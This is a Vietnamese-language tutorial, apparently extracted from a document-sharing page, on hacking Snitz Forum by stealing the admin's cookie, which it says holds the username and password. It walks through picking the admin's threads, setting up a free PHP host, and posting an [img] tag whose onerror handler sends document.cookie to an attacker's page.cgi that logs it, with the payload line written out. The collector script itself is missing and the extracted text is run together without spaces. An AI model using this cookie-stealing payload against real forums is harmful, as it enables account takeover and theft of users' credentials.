Hack ForumSnitz

SnitzForum có một lỗi khiến cho hacker có thể chạy được JavaScript để lấy cookie. Trong cookienày chứa username và password. Nếu ta lấy được username/pass của admin thì có thể kiểm soátđược hoàn toàn forum đó. Sau đây là các bước để hack các diễn đàn dùng SnitzForum
Nội dung trích xuất từ tài liệu:
Hack ForumSnitz HackForumSnitz:trangnàyđãđượcđọc lầnBàinàyđượcviếtchỉvớimụcđíchhọctập.Tôisẽkhôngchịubấtkìtráchnhiệmnàonếucácbạndùngnóvàomụcđíchpháhoại.SnitzForumcómộtlỗikhiếnchohackercóthểchạyđượcJavaScriptđểlấycookie.Trongcookienàychứausernamevàpassword.Nếutalấyđượcusername/passcủaadminthìcóthểkiểmsoátđượchoàntoànforumđó.SauđâylàcácbướcđểhackcácdiễnđàndùngSnitzForum1.Thuthậpthôngtin:tìmhiểuxemadminởđólàai,nhữngchủđềgầnnhấtmàhắnđãthamgia2.Đăngkí1freehostcóhỗtrợPHP,vídụnhưhttp://www.f2s.com/,nếucórồithìthôi3.Soạnthảovàupload1filecónộidungnhưsau(trongbàinàyđặttênlàpage.cgi):#!/usr/bin/php4.uploadmộtfileảnhhợplệnàođó(trongbàinàylàmypic.gif)lêncùngthưmụcvớipage.cgi.Fileảnhnàydùngđểtrảvềsaukhiscriptchạy.Nêndùngảnhnàocókíchthướccàngnhỏcàngtốt,vídụ1x1pixelchẳnghạn.5.Gửivàocácchủđềmàadminthamgianộidungsau:......anythingyouwant[img]http://www.yourpage.f2s.comonerror=this.src=src+page.cgi?test=+escape(document.cookie);[/img]6.Bấtkìaivàođọctopicđósẽbịchômcookie.Cácbạnchỉviệcngồiđợi,khỏiphảilàmgìhết.Muốnxemkếtquảthìchỉviệcmởfilemycookie.txtởcùngthưmụcvớifilepage.cgilàxong.KĩthuậtnàycóthểápdụngvàoSnitzForumbảnmớinhất.